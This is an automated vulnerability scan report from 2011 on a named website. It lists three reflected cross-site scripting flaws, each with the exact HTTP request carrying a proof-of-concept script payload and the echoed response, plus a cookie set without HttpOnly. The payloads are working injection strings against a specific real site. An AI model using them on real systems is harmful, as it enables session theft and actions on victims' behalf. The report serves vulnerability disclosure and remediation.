XSS, thedailyreviewer.com, Cross Site Scripting, CWE-79, CAPEC-86

XSS in thedailyreviewer.com | Vulnerability Crawler Report

Report generated by Unforgivable Vulnerabilities, DORK Search, Exploit Research at Fri Jan 07 15:48:29 CST 2011.



DORK CWE-79 XSS Report

Loading

1. Cross-site scripting (reflected)

1.1. http://thedailyreviewer.com/top/electronic-discovery/x22 [REST URL parameter 2]

1.2. http://thedailyreviewer.com/top/electronic-discovery/x22 [REST URL parameter 2]

1.3. http://thedailyreviewer.com/top/electronic-discovery/x22 [REST URL parameter 3]

2. Cookie without HttpOnly flag set



1. Cross-site scripting (reflected)  next
There are 3 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://thedailyreviewer.com/top/electronic-discovery/x22 [REST URL parameter 2]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thedailyreviewer.com
Path:   /top/electronic-discovery/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd094"><script>alert(1)</script>a880cfa0491 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /top/electronic-discoveryfd094"><script>alert(1)</script>a880cfa0491/x22 HTTP/1.1
Host: thedailyreviewer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 07 Jan 2011 21:38:19 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5
X-Powered-By: PHP/5.2.9
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=ff7c1ea0e30464ca8e1255d5e790859a; expires=Tue, 08-Jan-2036 03:38:19 GMT; path=/
Set-Cookie: CAKEPHP=ff7c1ea0e30464ca8e1255d5e790859a; expires=Tue, 08-Jan-2036 03:38:19 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15821

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a class="share-button" href="http://twitter.com/home/?status=Checkin%27%20out%20http://thedailyreviewer.com/top/electronic-discoveryfd094"><script>alert(1)</script>a880cfa0491/x22%20by%20@dailyreviewer">
...[SNIP]...

1.2. http://thedailyreviewer.com/top/electronic-discovery/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thedailyreviewer.com
Path:   /top/electronic-discovery/x22

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 187b4<img%20src%3da%20onerror%3dalert(1)>ac9e6dfd1db was submitted in the REST URL parameter 2. This input was echoed as 187b4<img src=a onerror=alert(1)>ac9e6dfd1db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /top/electronic-discovery187b4<img%20src%3da%20onerror%3dalert(1)>ac9e6dfd1db/x22 HTTP/1.1
Host: thedailyreviewer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 07 Jan 2011 21:38:23 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5
X-Powered-By: PHP/5.2.9
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=97097afa4e48c058092ea209bf06e8ba; expires=Tue, 08-Jan-2036 03:38:23 GMT; path=/
Set-Cookie: CAKEPHP=97097afa4e48c058092ea209bf06e8ba; expires=Tue, 08-Jan-2036 03:38:23 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15929

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<h1 class="headline">Top Electronic Discovery187b4<img Src=a Onerror=alert(1)>ac9e6dfd1db Blogs from </h1>
...[SNIP]...

1.3. http://thedailyreviewer.com/top/electronic-discovery/x22 [REST URL parameter 3]  previous

Summary

Severity:   High
Confidence:   Certain
Host:   http://thedailyreviewer.com
Path:   /top/electronic-discovery/x22

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcd65"><script>alert(1)</script>c56346e2b5c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /top/electronic-discovery/x22dcd65"><script>alert(1)</script>c56346e2b5c HTTP/1.1
Host: thedailyreviewer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 07 Jan 2011 21:38:26 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5
X-Powered-By: PHP/5.2.9
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dd81252c8c7adc0335d9c9a7e4257bf1; expires=Tue, 08-Jan-2036 03:38:27 GMT; path=/
Set-Cookie: CAKEPHP=dd81252c8c7adc0335d9c9a7e4257bf1; expires=Tue, 08-Jan-2036 03:38:27 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15701

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a class="share-button" href="http://www.facebook.com/share.php?u=http://thedailyreviewer.com/top/electronic-discovery/x22dcd65"><script>alert(1)</script>c56346e2b5c">
...[SNIP]...

2. Cookie without HttpOnly flag set  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://thedailyreviewer.com
Path:   /top/electronic-discovery/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

Request

GET /top/electronic-discovery/x22 HTTP/1.1
Host: thedailyreviewer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 07 Jan 2011 21:38:10 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5
X-Powered-By: PHP/5.2.9
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=acbad172eb056757ab68e63ea7b21e68; expires=Tue, 08-Jan-2036 03:38:11 GMT; path=/
Set-Cookie: CAKEPHP=acbad172eb056757ab68e63ea7b21e68; expires=Tue, 08-Jan-2036 03:38:11 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15357

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

Report generated by Unforgivable Vulnerabilities, DORK Search, Exploit Research at Fri Jan 07 15:48:29 CST 2011.